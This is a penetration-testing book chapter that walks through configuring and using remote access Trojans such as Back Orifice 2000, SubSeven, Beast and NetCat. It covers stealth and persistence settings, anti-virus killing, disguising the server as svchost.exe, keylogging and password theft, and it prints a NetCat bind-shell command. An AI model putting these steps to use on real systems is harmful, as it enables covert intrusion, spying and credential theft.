Trojans and Backdoors

 < Day Day Up > 

Now that you have a history and understanding of viruses and worms, it is time to progress to Trojan horse and backdoor applications. Although it is important to know about viruses and worms when discussing how to secure the network of an organization, they are not common tools employed by a penetration tester. Trojan horses, however, are often used as proof of concept tools to demonstrate gaining and maintaining access to compromised target systems.

This section covers the following Trojan horse and backdoor applications:

  • Back Orifice 2000

  • NetCat

  • Tini

  • Rootkit

  • Donald Dick

  • SubSeven

  • Brown Orifice

  • Beast

Back Orifice 2000

Back Orifice 2000 (BO2K) is a client-server remote administration tool (RAT) created by the Cult of the Dead Cow (www.cultofdeadcow.com). Founded in 1984, the Cult of the Dead Cow (cDc) is a hacktivist organization based out of Lubbock, Texas whose goal is to promote security awareness.

Back Orifice 2000 was written by DilDog, a member of cDc. It is the successor to Back Orifice. BO2K supports the following features:

  • Keystroke logging

  • Registry editing

  • File transfers

  • Command shells

  • Process control

  • Remote shutdown and reboot

  • Password dumping

  • Screen capture

  • Mouse and keyboard control

  • Encrypted communication

BO2K is composed of three main files:

  • bo2k.exe

  • bo2kcfg.exe

  • bo2gui.exe

The bo2k.exe file is the main Trojan executable. To remotely control your target system, you must first have this executable copied and loaded. One of the advantages of Back Orifice 2000 is the capability to delete the bo2k.exe file and hide it after it is running. This stealth capability means that a server administrator cannot see this program listed in Windows task manager.

The second file, bo2kcfg.exe, is the Back Orifice 2000 server configuration utility. This utility configures your Trojan server with such options as port number, encryption algorithm, and various stealth features.

Begin by launching the executable and choosing Open Server. Then choose the bo2k.exe server executable, as shown in Figure 12-1.

Figure 12-1. Back Orifice 2000 Server Configuration


Next, you need to install and configure the plug-ins. Plug-ins allow for new features to be added to Back Orifice 2000 without the need to release a new version. Figure 12-2 demonstrates installation of the authentication plug-in.

Figure 12-2. Installing the Authentication Plug-In


You can download plug-ins from http://www.bo2k.com. This website divides the available plug-ins into the following categories:

  • Encryption plug-ins

  • Authentication plug-ins

  • Server enhancement plug-ins

  • Client enhancement plug-ins

  • Communications plug-ins

  • Miscellaneous plug-ins

Encryption is advantageous because of its capability to mask what you are doing. A server administrator who has a packet sniffer cannot detect what you are doing on the target server. Also, encrypting your communication makes it more difficult to detect with an IDS device. Encryption options include AES, Serpent, CAST-256, and IDEA.

At press time, there is only one authentication plug-in, and it comes with the program. The authentication plug-in allows you to use a password with Back Orifice 2000.

Several server plug-ins are available. Most provide a means of notifying you after the Trojan is installed on a remote system. For example, the Rattler plug-in notifies you via e-mail of the IP address of the target system that is running the Trojan. This is helpful in environments that are running Dynamic Host Configuration Protocol (DHCP), where the IP address of systems change frequently. The SimpleRicq plug-in notifies you via the Internet Relay Chat (IRC) instead of e-mail, and the Rcgi plug-in notifies you on a web page via a CGI script.

At press time, only one client enhancement plug-in is available: BoTool. BoTool provides a graphical file browser and registry editor that makes common tasks easier by using a simplified user interface.

Communications plug-ins entail what transport layer protocol and port you want to use for your communication. Options include Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and encrypted TCP. The encrypted TCP plug-in provides an encrypted flow control mechanism to make BO2K TCP traffic harder to detect. Upon adding the TCP or UDP communication plug-in, you need to configure what port number you want to communicate in. There are settings you need to set to configure the port number.

Go to the startup option and choose the Init Cmd Bind Str setting. Type the value of the port number you want to use and click the Set Value button, as illustrated in Figure 12-3. You can choose whatever port number you want in this setting. In Figure 12-3, the port number 31337 is chosen, which is the port number that the original Back Orifice used.

Figure 12-3. BO2K Init Cmd Bind Str


The second place you need to set the port number is under the TCP or UDP options. (TCP is used in this example.) Select the Default Port setting, type the port number, and click the Set Value button, as shown in Figure 12-4.

Figure 12-4. BO2K TCP Settings


Finally, the miscellaneous plug-ins include BoPeep and LoveBeads. They are labeled Miscellaneous because they do not fall into any of the other categories. BoPeep is a popular plug-in because it allows you to see a streaming video of the machine's screen that the server is running on. It also allows you to control the victim's keyboard and mouse. LoveBeads allows you to chain several Back Orifice 2000-infected computers. With LoveBeads, you can connect to one infected computer and use it as a proxy to connect to other computers.

Some other options will probably be of interest to you that are not part of any plug-in but are part of the default installation of Back Orifice 2000. One of these is the Stealth option, the settings for which are shown in Figure 12-5.

Figure 12-5. BO2K Stealth Options


You might want to enable three settings to provide added stealth. Remember: As a penetration tester, you are concerned not only with what you are able to do to your target of evaluation, but also with what you are able to do without being detected. Therefore, stealth is always important in your testing.

The first of these options is the Run at startup option. Although this is not necessarily a Stealth setting, this option does execute the Trojan when Windows starts up. Without this option, you need to have some other mechanism of launching the bo2k.exe executable every time Windows starts up.

The second useful option is Delete original file. This provides added stealth by deleting the bo2k.exe file after you load the Trojan into memory.

The third useful option is Hide process. Without this option, Back Orifice 2000 shows up in the Windows Task Manager. This makes it easy to detect and, subsequently, easy to stop.

However, with the Hide process option selected, this Trojan does not show up, hiding it from unsuspecting administrators.

You can also choose Insidious mode. Insidious mode causes Back Orifice to rename itself so that Windows Explorer cannot see the file correctly. Bo2k adds 254 spaces to the beginning of the filename so that Windows Explorer does not correctly display the filename.

After your options are configured, you should select Save Server to save your configuration. (See Figure 12-6.)

Figure 12-6. BO2K Save Configuration


Next, run the bo2k.exe executable on the target machine.

Now that the Trojan is running, you can connect to your target computer by using the Back Orifice 2000 client application. Figure 12-7 shows the client utility called bo2kgui.exe.

Figure 12-7. Bo2kgui.exe Back Orifice 2000 Client Utility


Before you can connect to your target computer, you must configure the appropriate plug-ins, as you did with the server configuration tool earlier. To do this, select the Plugins menu and choose Configure, as shown in Figure 12-8.

Figure 12-8. BO2K Client Plugins Option


Click the Insert button to insert the plug-ins. (See Figure 12-9.) With the exception of server enhancement plug-ins, you should include all the plug-ins that you selected earlier with the Bo2kcfg.exe server configuration utility.

Figure 12-9. BO2k Client Plugins Installation


Next you need to connect to your target machine. From the File menu, select New Computer, and enter a name, IP address, and port number of your target computer. Figure 12-10 uses TCP port 31337 (the same port you configured on the server earlier). Note that you enter the port number immediately after the IP address in the format of ip address:port number.

Figure 12-10. BO2K Server Settings


Double-click on the new server listed under Machines in the BO2K workspace window to bring up the window in Figure 12-11. Select the Connect button to connect to the target system.

Figure 12-11. BO Server Connection Window


When you are connected to the server, you can control the server using the options in the Server Commands window. By clicking on the Server Control option, as shown in Figure 12-12, you can remotely shut down and restart the server; load, debug, list, and remove plug-ins; and start, list, and stop command sockets.

Figure 12-12. BO Server Control Options


Under the Registry option, you see the options shown in Figure 12-13. With these options, you can add, delete, and rename keys and key values in the Windows registry.

Figure 12-13. BO Registry Control


If you want to see the files on your target system and download the file locally, go to File/Directory options, as shown in Figure 12-14. Here you can create new directories, delete files, and even upload files to the remote target machine, to name just a few options.

Figure 12-14. BO Server File/Directory Options


As an example, you can select List Directory, type a path such as C:\, and click the Send Command button. This produces a directory listing in the bottom pane, as shown in Figure 12-15.

Figure 12-15. BO Server List Directory Example


Back Orifice 2000 has many other options. You should experiment with the various options and plug-ins available to find those that will help you in your testing. Remember, however, the ultimate goal in penetration testing: to assess the security posture of a target network. Although options such as LoveBeads and BoPeep are helpful for malicious hackers, they are not as helpful for penetration testers. What you are attempting to do is show proof of concept on the vulnerability of a server. If the system is vulnerable and you are able to download, upload, and delete files, you have demonstrated that the target system is susceptible to Trojans. You have to assess whether you need to attempt every useable option in Back Orifice 2000.

Having so many options is certainly advantageous, but the drawback is in the amount of configuration that you need to do both with the client and server configuration utility. As an alternative, you might want to look at simpler remote access Trojans.

Tini

One simpler RAT tool is Tini. Tini is not only simpler to use than a tool like Back Orifice 2000, but it is also much smaller. Remember: As a penetration tester, you want to see how much you can do without being detected, and using a smaller Trojan makes it less likely of being detected. Tini, as its name implies, is a small RAT (only 3 KB in size). You can download Tini at http://ntsecurity.nu/toolbox/tini.

Having such a small size comes at a price, however. It is limited in functionality. After executing the Tini program on a target system, you can Telnet to the system on TCP port 7777. Using Telnet gives you a remote shell on your target system through which you can list directories or launch programs. This is limited in comparison to BO2K, but it is simpler to use and easier to get installed without being seen because of its small size.

Donald Dick

Donald Dick is a Trojan that is both simple to use and highly functional. With Donald Dick, you can do the following:

  • View processes

  • View the file system

  • Upload and download files

  • Execute programs

  • View the registry

  • Create new registry entries

  • View and kill processes

  • Retrieve screensaver and Complimentary Metal Oxide Semiconductor (CMOS) passwords

  • View and change the system time

  • Get a screenshot of the target system

  • Open and close the CD-ROM tray

  • Turn the monitor on or off

  • Shut down or reboot the computer

  • Log off the current user

  • Send a message

  • Play a WAV file

Like most remote access Trojans, Donald Dick has both a client utility and a server utility. Copy the server utility onto your target system and run it. Next, run the client utility, shown in Figure 12-16.

Figure 12-16. Donald Dick Client Utility


Enter the IP address of your target system and then select the tab containing the function you want to attempt. For example, you can click on the File System tab and view the directory listing, as shown in Figure 12-17.

Figure 12-17. Donald Dick Directory Listing


By right-clicking in this window, you can upload, download, and delete files and directories. You can even execute programs remotely.

If you want to view the registry of your target system, click the Registry tab, as shown in Figure 12-18. Here, you can drill down into the registry settings. Figure 12-18 shows drilling down into the HKEY_LOCAL_MACHINE\SOFTWARE key.

Figure 12-18. Donald Dick Registry Tab


By right-clicking in this window, you can change, delete, or add a new registry value. (See Figure 12-19.) For example, you can add a new string value to the HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN key to make the Donald Dick server executable load on Windows startup.

Figure 12-19. Adding a Registry Value


By clicking on the Windows tab, you can view all the current windows that are running on the target system. For example, in Figure 12-20, you can see that two MS-DOS command prompts are open (C:\windows\system32\cmd.exe).

Figure 12-20. Donald Dick Windows Tab


As a penetration tester, it might not be that beneficial to know what windows are currently active on a server. What is helpful in a penetration test is being able to retrieve the passwords of your target system. You can do this by clicking Donald Dick's Passwords tab, as shown in Figure 12-21. You can get the screensaver password on Windows 95 and Windows 98 computers (and change it) and even get the CMOS password for common CMOS programs.

Figure 12-21. Donald Dick Passwords Tab


Clicking on the Miscellaneous tab (see Figure 12-22) offers numerous other options. Here you can cause the system to shut down or reboot, log off the current user, open or close the CD-ROM tray, and turn the monitor on or off. You can even capture a screenshot of the computer by clicking the ScreenShot button. (The screenshot is stored locally as shot$$$.bmp.)

Figure 12-22. Donald Dick Miscellaneous Tab


The Miscellaneous tab also offers the capability to send the target system a pop-up message. You can use this for social engineering purposes. For example, you can have a pop-up message asking the user to confirm information. (See Figure 12-23.)

Figure 12-23. Donald Dick Message Box


Finally, you can gain information about the location of Windows system files, the computer name, and the current logged on user by clicking Get Sysinfo from the System tab. (See Figure 12-24.) This is useful in enumerating user and system information in preparation for launching further attacks.

Figure 12-24. Donald Dick System Tab


Donald Dick is a feature-rich client-server Trojan application. It does not have a way of hiding itself, however. It shows up in Task Manager as pmss.exe on Windows NT/2000/2003 systems.

Rootkit

One way to hide files on your target system is to use the NT/2000 Rootkit. This is a kernel mode driver that allows you to hide processes, files, and registry entries. Rootkit has two main files:

  • _root_.sys

  • deploy.exe

You need to copy both of these files to the target system. After you have copied them, execute the deploy.exe executable, which loads _root_.sys into memory. When this is loaded, you can delete the deploy.exe program.

Rootkit hides all files that begin with _root_ when the rootkit is started. To run the rootkit, type net start _root_. To stop the rootkit, type net stop _root_.

For example, if you want to hide a Trojan utility called server.exe, you can rename it to _root_server.exe. After you type net start _root_, the Trojan executable is hidden from view. Directory listings do not show the program.

Rootkit is an excellent way to hide programs such as Trojans on your target machine.

Note

Another utility that works similarly to the NT/2000 Rootkit is Fu (http://www.rootkit.com). Instead of deploy.exe and _root_.sys, it uses fu.exe and msdirectx.sys.


NetCat

NetCat is known as the Swiss-army knife of hacking. You can use it to gain access to a remote shell (like other remote access Trojans), scan ports, perform banner grabbing for reconnaissance purposes, and transfer files.

For the purposes of this chapter, this section covers using NetCat to shovel a remote shell and transfer files.

To shovel a remote shell, copy the NetCat nc.exe executable to the target machine and run the following command:

c:\nc -l -p 1111 -e cmd.exe -d

Several switches are used in this example:

  • -l This switch tells NetCat to begin listening for connections. This switch is used only on the target system.

  • -p 1111 This switch tells NetCat to begin listening on port 1111. You can specify any port you want.

  • -e cmd.exe This switch tells NetCat to execute the command cmd.exe (command shell). You can instruct NetCat to execute any command you want.

  • -d This command tells NetCat to run in daemon mode.

Next, you need to start NetCat on your computer. Assuming your target is 192.168.1.29 and your port number is 1111, execute the following command:

c:\nc 192.168.1.29 1111

Look at Figures 12-25 and 12-26 for an example of using NetCat to shovel a remote shell. In this example, you connect to a remote computer on port 1111 and create a directory called hacked.

Figure 12-25. NetCat Target


Figure 12-26. NetCat Client


Of course, many environments deploy firewalls that limit what ports you can use. However, some ports are commonly allowed in. TCP port 80 (HTTP/web), TCP port 53 (DNS zone transfers), and TCP port 25 (SMTP) are commonly allowed inbound. Even if the server is running a service like a web server, DNS server, or e-mail server, you can still use NetCat to connect into that port. If you use port 80, for example, the first NetCat connection gives you a remote shell, but all subsequent connections connect you to the web server.

The second Trojan use of NetCat is to upload and download files from a remote system. For this example, NetCat is used to upload a file called secret.txt to the target server. First, load NetCat in listener mode on port 1111. Specify that you are waiting to receive a file called secret.txt. (See Figure 12-27.)

Figure 12-27. NetCat Target


Next, send the file secret.txt to the server. (See Figure 12-28.)

Figure 12-28. NetCat Client


To verify that NetCat indeed copied the file, reconnect into the target server and view the file using the type command. (See Figure 12-29.) The file contains the text "You've been hacked by NetCat!"

Figure 12-29. NetCat Verification


Because NetCat is executed from the command line, it can be tied into a scripted attack. It is also small (about 60 KB), making it easy to upload and run without being detected. NetCat has many features and is definitely a tool you should have in your penetration testing "toolbelt."

Tip

For added stealth, you might want to use Cryptcat. Cryptcat, developed by Farm9, takes the original NetCat for Windows and adds Twofish encryption. Encrypting your NetCat communication makes it less likely for packet sniffers and IDS to detect it.


SubSeven

SubSeven is a powerful Trojan created by FuX0red that is available at http://www.sub7.net. Four files are included in the SubSeven package:

  • Subseven.exe This is the client application you can use to remotely control your target system.

  • Server.exe This is the server executable you need to copy and execute on your target host.

  • Editserver.exe This is the file you use to configure server.exe.

  • Icgmapi.dll This DLL is necessary only if you want to use the ICQ features of SubSeven.

SubSeven has similarities to Back Orifice 2000 in that it has a client, server, and server configuration utility. You should begin by opening the server configuration utility (Editserver.exe), as shown in Figure 12-30.

Figure 12-30. SubSeven Editserver.exe


Click the browse button and select the server (server.exe). Then select the read current settings button to import the current server.exe configuration. Usually the default settings are acceptable, but you might want to change a few. You can break down the server settings into the categories shown in Table 12-1.

Table 12-1. SubSeven Server Settings

Category

Description

Startup method(s)

Use this to control how SubSeven starts. Popular options include adding it to the RunService or Run key in the Windows registry. The key name represents how it is to appear in the registry.

Notification options

These options detail how you want to be notified of an infected host. You can choose to be notified via e-mail, ICQ, or IRC.

Protect server

You can add a password so that others cannot edit it using the Server edit utility. Note that this is different from the password in the installation options.

Installation

Here you can choose what port you want SubSeven to use. (The default is 27374.) You can also set a password so that you can only connect with the correct password. (This is different from the password in the protect server options.) You can also enable a fake error message to appear when the Trojan is executed on the server to lead unsuspecting users away from thinking a Trojan is being installed.


The installation section has an option to bind the Trojan to another executable (bind server with EXE file ?). Binding, or wrapping, a Trojan into another executable is a way to hide the file from unsuspecting users. You can wrap the Trojan around a legitimate executable such as Notepad.exe, and when the user launches the program, the Trojan is installed.

Tip

The author of the Trojan, FuX0red, recommends that you use another program to bind it. Some tools to wrap your Trojan into another .exe file include OblivionJoiner (http://www.oblivionrat.com), and Exebinder (http://www.elitec0ders.net).


After you have configured the server to your liking, press the save new settings button.

Next, copy the executable to your target host and launch it. Use the SubSeven client application to connect to the remote host. (See Figure 12-31.)

Figure 12-31. SubSeven Client Utility


The SubSeven Trojan has many functions that you can run against your infected target. These functions are broken down into the categories shown in Table 12-2.

Table 12-2. SubSeven Features

Category

Features

Connection

IP Scanner, Get PC Info, Get Home Info, Server Options, IP Notify

Keys/messages

Keyboard, Chat, Matrix, Msg Manager, Spy, ICQ Takeover

Advanced

Ftp/Http, Find Files, Passwords, Reg Edit, App Redirect, Port Redirect

Miscellaneous

File Manager, Window Manager, Process Manager, Text-2-speech, Clipboard Manager, IRC Bot

Fun manager

Desktop/Webcam, Flip Screen, Print, Browser, Resolution, Win Colors

Extra fun

Screen Saver, Restart Win, Mouse, Sound, Time/Date, Extra

Local options

Quality, Local Folder, Skins, Misc Options, Advanced, Run EditServer


Although numerous options are available with SubSeven, this section highlights some of the more interesting ones, such as the following:

  • IP Scanner

  • Get PC Info

  • Keyboard Logging

  • Chat

  • Matrix Screensaver

  • Msg Manager

  • Find Files

  • Passwords

  • Reg Edit

  • File Manager

  • Window Manager

  • Process Manager

  • Clipboard Manager

  • Desktop/Webcam

  • Flip Screen

  • Browser

  • Restart Win

  • Mouse

  • Extra Features

The IP scanner, shown in Figure 12-32, scans a subnet range for hosts who have been infected with the SubSeven Trojan. To prevent raising IDS alarms, you can change the delay time. (The default is four seconds.)

Figure 12-32. SubSeven IP Scanner


As shown in Figure 12-33, the get pc info option is under the connection tab. By clicking the retrieve button, you can pull information about the computer name, username, OS version, location of system files, and more. This is helpful when performing reconnaissance on your target system.

Figure 12-33. SubSeven Get PC Info


You can find the keyboard option, shown in Figure 12-34, under the keys/message tab. This option runs a remote keylogger on your target host. You can log all keys typed by users, send keys yourself, and even disable the keyboard.

Figure 12-34. SubSeven Keyboard Option


When you choose to send keys to the remote target host, you can also choose which active program to send the text to. (See Figure 12-35.) The program must be actively running on the target and be able to accept text input. Word processors are the best option for sending keys. In Figure 12-35, the message "You've been hacked!" is sent to the Notepad application on the target host. (See Figure 12-36.)

Figure 12-35. SubSeven Send Keys Option


Figure 12-36. SubSeven Send Keys Result


The chat option shown in Figure 12-37 allows you to launch a chat window with the logged in user on the target system. You can imagine the surprise on an unsuspecting user when a window pops up asking to chat with him. You can choose the size of the popup chat window, the colors, and the font sizes. You can even choose to chat with other SubSeven clients.

Figure 12-37. SubSeven Chat Options


SubSeven even has the capability to activate a Matrix screensaver on the remote machine. (See Figure 12-38). This is a malicious hacker's way of showing that he has "owned" the box. You can type text to be displayed when the screensaver is activated, such as "you've been hacked."

Figure 12-38. SubSeven Matrix Feature


The msg manager feature shown in Figure 12-39 allows you to send a message to the remote infected host. The response from the user is sent back to you. You can use this as a social engineering tool to ask for information such as passwords from unsuspecting users.

Figure 12-39. SubSeven Msg Manager Feature


Also under the advanced tab is the find files feature (see Figure 12-40), which allows you to search the hard drive of the remote host for files. This assists you in searching for important files that might be of value to the administrators of the target machine. For example, you can use this to search for the SAM file, which contains a list of all accounts and hashed passwords. SubSeven even saves a list of files it finds so that you can review the list later. Click show previously found files to see this cached list. (Because the SAM is unavailable while it is in use, you should look for the copy of the SAM file in the Repair directory.)

Figure 12-40. SubSeven Find Files Feature


As a penetration tester, you should be actively looking for ways to gather passwords from your target system. SubSeven can assist you with this using its passwords feature under the advanced tab. (See Figure 12-41.) Here you can get any cached passwords that are currently stored in RAM, recorded passwords, RAS, ICQ, and AOL Instant Messenger passwords.

Figure 12-41. SubSeven Password Retrieval Feature


The reg edit feature, also under the advanced tab, allows you to remotely edit the registry of your target system. This is helpful in several ways. You can use this to get the SIDs and number of users from the HKEY_USERS hive key, see what software is installed on the system by examining the HKEY_LOCAL_MACHINE/SOFTWARE key, or add a key to have Windows start a program upon startup in the HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN key. Figure 12-42 demonstrates drilling down into specific keys. Note that SubSeven allows you not only to view the remote registry, but also to change, delete, or add new keys and values.

Figure 12-42. SubSeven Reg Edit Feature


You can find the file manager feature under the miscellaneous tab. (See Figure 12-43.) The file manager is filled with numerous features, including the capability to do the following:

  • Upload and download files

  • Delete files

  • Print files

  • Edit files

  • Get the size of files

  • Play WAV files

  • View .jpg images

  • Execute files

  • Change the desktop wallpaper

Figure 12-43. SubSeven File Manager


The windows manager (see Figure 12-44) allows you to see all the active windows running on the remote host. You can even close programs running on the remote host, causing a DoS attack. Be sure to click show all applications to see all applications that are running on your target.

Figure 12-44. SubSeven Windows Manager Feature


Somewhat related to the windows manager is the process manager, shown in Figure 12-45. Here you can see the underlying processes that applications are using. You can even change the priority of a process to make it gain more or less resources than other processes. Available priorities include Realtime, High, AboveNormal, Normal, BelowNormal, and Low. If you want to perform a DoS attack and stop processes, you can click on the process you want to stop and click the kill app button.

Figure 12-45. SubSeven Process Manager Feature


Users often copy and paste text using the Windows clipboard feature so that they do not have to retype the same text again. Using the SubSeven clipboard manager found under the miscellaneous tab (see Figure 12-46), you can view what is currently in the clipboard. Of course, this requires that information be in the clipboard. You can also use the clipboard manager to change what is currently in the clipboard. A user might copy text that says, "This is important information that should be secure." Then, using the SubSeven Clipboard Manager, you can change this to read, "You've been hacked!" When the user pastes the text into his word processor, he does not see the text he copied but instead sees what you placed in the clipboard: the message, "You've been hacked!"

Figure 12-46. SubSeven Clipboard Manager


Under fun manager are numerous fun tools that, although not necessarily useful to penetration testers, are commonly used by malicious hackers. The first of these options under the fun manager tab is the desktop/webcam feature shown in Figure 12-47. Here you can open a screen preview of what the user on the target system is looking at, perform a full screen capture, or perform a webcam/quickcam capture.

Figure 12-47. SubSeven Desktop/Webcam Capture


A Spanish student by the initials of G.J.A.L. used the webcam capture utility in January 2002 to spy on a woman by capturing webcam images of her while she sat in front of the computer. He then took the images and e-mailed them to his friends. He was caught when he accidentally sent a picture of the girl to her when he meant to send it to a friend. He was arrested and fined 3000 euros for the crime.

The fun manager and the extra fun tab have many other options that malicious hackers use as pranks or to notify their victims that they are under attack. Table 12-3 illustrates the various options available under these tabs.

Table 12-3. Fun Manager and Extra Fun Options

Tab

Option

Description

Fun manager

Desktop/webcam

Takes a screen capture.

Flip screen

Flips screen vertically or horizontally.

Print

Causes text that the hacker chooses to be printed to the default printer on the victim machine.

Browser

Opens a web browser on the computer of the victim to a web page that the malicious hacker chooses.

Resolution

Changes the resolution settings on the victim computer.

Win colors

Changes the number of colors supported by the victim machine.

Extra fun

Screen saver

Changes the screensaver on the victim machine.

Restart win

Performs a simple DoS attack by shutting down Windows, logging off the current user, or rebooting the system.

Mouse

Controls the mouse of the victim machine. Allows you to reverse mouse buttons, hide the mouse pointer, control the mouse, set the mouse trail size, or hide the mouse trails (commonly used on laptops).

Sound

Changes the default sounds.

Time/date

Changes the time and date on the victim computer.

Extra

Allows you to hide/show the desktop, start button, or taskbar; opens/closes the CD-ROM tray; turns on/off the monitor, ctrl-alt-delete, caps lock, scroll lock, num lock; starts/stops the speaker.


Brown Orifice

Brown Orifice, named after Back Orifice and written by Dan Brumleve, is a Trojan that exploits a Java security hole in the Netscape web browser versions 4.0 through 4.74. When an unsuspecting user browses to a site with the Brown Orifice Java applet, his computer becomes infected with the Trojan. His computer then becomes a web server listening on TCP port 8080 and allows others to access all files on his hard drive. You can access files through the web browser by using the file:// URL syntax. For example, to see the files at the root of a hard drive on an infected computer with the IP address of 192.168.1.29, type this:

file:///192.168.1.30:8080/c:/

Brown Orifice runs only as long as the Java Virtual Machine is active. This is usually active only when the web browser is running, so when the user closes his Netscape web browser, the Trojan is stopped (until the web browser is started again).

Beast

Beast is a remote administration Trojan written in Delphi by Tataye at Fearless Crew http://www.tataye.tk). Beast is unique from other Trojans in that the client, server, and server configuration utility are all in one executable.

Beast caught media attention in October 2003 when Van Dinh was arrested after using the Beast Trojan to capture keystrokes of an investor accessing an online brokerage website. It is estimated that Van Dinh, who was 19 at the time, caused more than $37,000 worth of damage.

The Beast executable, shown in Figure 12-48, has two main sections:

  • Server settings

  • Client

Figure 12-48. Beast Executable


Beast Server Settings

To access these server settings, click on the Build Server button. You can configure six areas, as described in Table 12-4.

Table 12-4. Beast Server Settings

Setting

Options

Basic

Set the server name, port, and password. Also select how you want to package (bind) the Trojan and in what directory you want to place it.

Notifications

Configure how you want to be notified of an infected host. Options include CGI, e-mail, ICQ, and static IP notification (SIN).

StartUp

Configure how you want the Trojan started when Windows loads. Options include ActiveX, HKey Local Machine, and HKey Current User.

AV-FW Kill

Configure Beast to stop any anti-virus or firewall applications.

Misc.

Configure keylogging, fake error messages, and other options.

Exe Icon

Configure the icon that the Beast server uses.


Figure 12-49 shows the first of these options, the Basic server settings.

Figure 12-49. Beast Basic Server Settings


First, enter the name of the server and, optionally the password you want to use to connect to the server. Some malicious hackers use passwords to prevent other malicious hackers from using the Trojan. When picking a name, choose one that mimics a Windows executable, such as svchost.exe. This provides stealth, because systems administrators who see a program such as svchost.exe running would have no way of knowing that a Trojan was running. However, do not put the Trojan in the same directory as the legitimate executable, because it would overwrite the system file. You have two locations to place the Trojan: in the Windows directory, or in the Windows/system directory. If the legitimate file is in the Windows directory, choose the Windows/system directory. Likewise, if the legitimate file is in the Windows/system directory, place the Trojan in the Windows directory.

Next, you need to configure the server to use either direct connection or reverse connections. With a direct connection, you manually enter the IP address of the infected host in the client and connect directly to the Trojan. With a reverse connection, the Trojan notifies you with its IP address, causing the Trojan server to initiate the connection to the client. If you choose reverse connection, you need to enter a static IP notification (SIN) port number or keep it at the default port 9999. If you are using a direct connection, you can skip configuring a SIN port number, but you might want to configure the listening port. (The default is 6666.)

Next, you should configure how you want to inject the Trojan. You can bind the Trojan to Internet Explorer, Explorer.exe, or to another executable, such as Notepad.exe. You can also choose not to wrap the Trojan, but that does not provide as much stealth.

If you do want to be notified when the server becomes infected, you need to click on the Notifications button and configure the way you want to be notified. (See Figure 12-50.) Your options include these:

  • SIN

  • E-mail

  • ICQ

  • CGI

Figure 12-50. Beast Notification Options


Putting a Trojan on a system and running it is not enough, however. You might also want to configure the infected system so that it runs the Trojan on startup. You can do this by clicking on the StartUp button shown in Figure 12-51. Here, you can choose to run the Trojan via the ActiveX method, HKey Local Machine, or HKey Current User. Only use the ActiveX method when you bind Beast to Internet Explorer. The HKey Local Machine option adds a registry entry that affects all users who are logged into the machine, whereas the HKey Current User only runs the Trojan whenever the infected user logs onto the system.

Figure 12-51. Beast StartUp Options


After you set the StartUp options, you should select the AV-FW Kill settings shown in Figure 12-52. Beast recognizes hundreds of common firewall and anti-virus software applications, including the built-in XP firewall. Using this feature, you can terminate these security applications. Because many of the popular anti-virus and firewall applications can be configured to be restarted if they are terminated, Beast provides an option to continually terminate them for a specified number of seconds. (The default is five seconds.)

Figure 12-52. Beast AV-FW Kill


Beast also has miscellaneous server options. (See Figure 12-53.) Common options include melting the server on install, enabling a keylogger, and clearing restore points on Windows XP machines. Melting the server on install removes the executable server file when the Trojan is executed. The Trojan remains running in RAM but does not exist as a file on the hard drive. Note that if you select this option, you cannot select the Windows startup options because the Trojan file no longer exists when the computer reboots. Enabling the keylogger allows you to monitor whatever users are typing on the infected host. The third common option is to clear restore points. Windows XP provides a restore feature to help restore your computer to a previous state if the system gets corrupted. Choosing to clear restore points prevents the infected host from being able to revert to a previous known-good state.

Figure 12-53. Beast Miscellaneous Server Options


The final server setting is to choose the Exe Icon, as shown in Figure 12-54. Although the choice you make is not that significant, you should choose a common Windows icon so that you do not raise suspicion. This becomes especially important if you are attempting to send the Trojan via e-mail, because the unsuspecting user sees the icon and has to evaluate it to determine if it is safe.

Figure 12-54. Beast Exe Icon


After you have finished selecting your server options, select the Save Server button.

Next, you need to upload the Trojan and execute it on the server, as you did with the other Trojans mentioned in this chapter.

Many anti-virus software programs detect Beast as a Trojan and do not allow it to be installed. If you want to circumvent firewalls, you need a modified version of Beast. The author of Beast offers such a modified version for a small fee. He mutates the program so that it is a unique copy that is undetectable by anti-virus software applications.

Beast Client

When you have finished uploading and executing the Trojan on your target host, you will want to control the server remotely. To do this, enter the IP address and, if configured, the password. Then click Connect from the main Beast program window. If you have chosen a different port number than the default of 6666, enter that, too. You then see the screen shown in Figure 12-55.

Figure 12-55. Beast Client


Seven categories of client control utilities exist:

  • Managers

  • Windows

  • Lamer Stuff

  • Fun Stuff

  • Server

  • Misc

  • Beast Stuff

From the Managers category, you can manage the Windows file system (see Figure 12-56), control the registry, see the screen, enable the webcam, manage applications or processes, start and stop services (see Figure 12-57), and collect passwords (see Figure 12-58). You also can retrieve protected storage, ICQ, and dial-up passwords.

Figure 12-56. Beast File Manager


Figure 12-57. Beast Services Manager


Figure 12-58. Beast Password Retrieval Utility


The Windows options, shown in Figure 12-59, allow you to hide windows, crash programs, reboot, shut down, and log off users. These options are commonly used as a DoS attack.

Figure 12-59. Beast Windows Options


The Lamer Stuff options (shown in Figure 12-60) allow many of the same gimmick functions found in other Trojans mentioned in this chapter. Here you can swap mouse buttons, close the CD-ROM tray, and hide common desktop items such as the clock or desktop icons.

Figure 12-60. Beast Lamer Stuff


The next option, Fun Stuff, is closely related to the previous utilities. Shown in Figure 12-61, here you can hide the mouse, change the wallpaper, chat with the user on the infected host, or launch a web browser and go to a website of your choosing.

Figure 12-61. Beast Fun Stuff


Next is the Server option, shown in Figure 12-62. Here you can update the server to the current version (2.06 at the time of writing) or close the server. If you suspect that your Trojan might be detected, you might want to terminate it from running.

Figure 12-62. Beast Server Options


Earlier, in the server setup, you had the option of configuring a keylogger. To activate the keylogger, click on the Misc button, shown in Figure 12-63. Note that this requires a plug-in to be uploaded to the server. You can either preload the plug-ins by clicking the Plugins button, or you can load it upon selecting the KeyLogger function.

Figure 12-63. Beast Misc. Options


The Misc options also include a Scanner feature. As shown in Figure 12-64, this feature scans an IP subnet and detects any other hosts who are infected with the Beast Trojan.

Figure 12-64. Beast Scanner


Like the Donald Dick and SubSeven Trojans, you can send a message to the infected host. In Beast, you can find this message option under the Misc options, along with the Scanner and KeyLogger utilities. Figure 12-65 shows the various options available with sending a custom error message to the server, a technique commonly used with social engineering. (For more on social engineering, see Chapter 4.)

Figure 12-65. Beast Custom Error Messages


Finally, Beast offers the capability to run your own program. Also found in the Misc options, the Run Appz feature in Figure 12-66 lets you run a program of your choice. Figure 12-66 shows the nbtstat program running to show which TCP and UDP ports are listening. The first entry is an established TCP connection on port 6666, which happens to be the port that Beast runs on.

Figure 12-66. Beast Run Appz


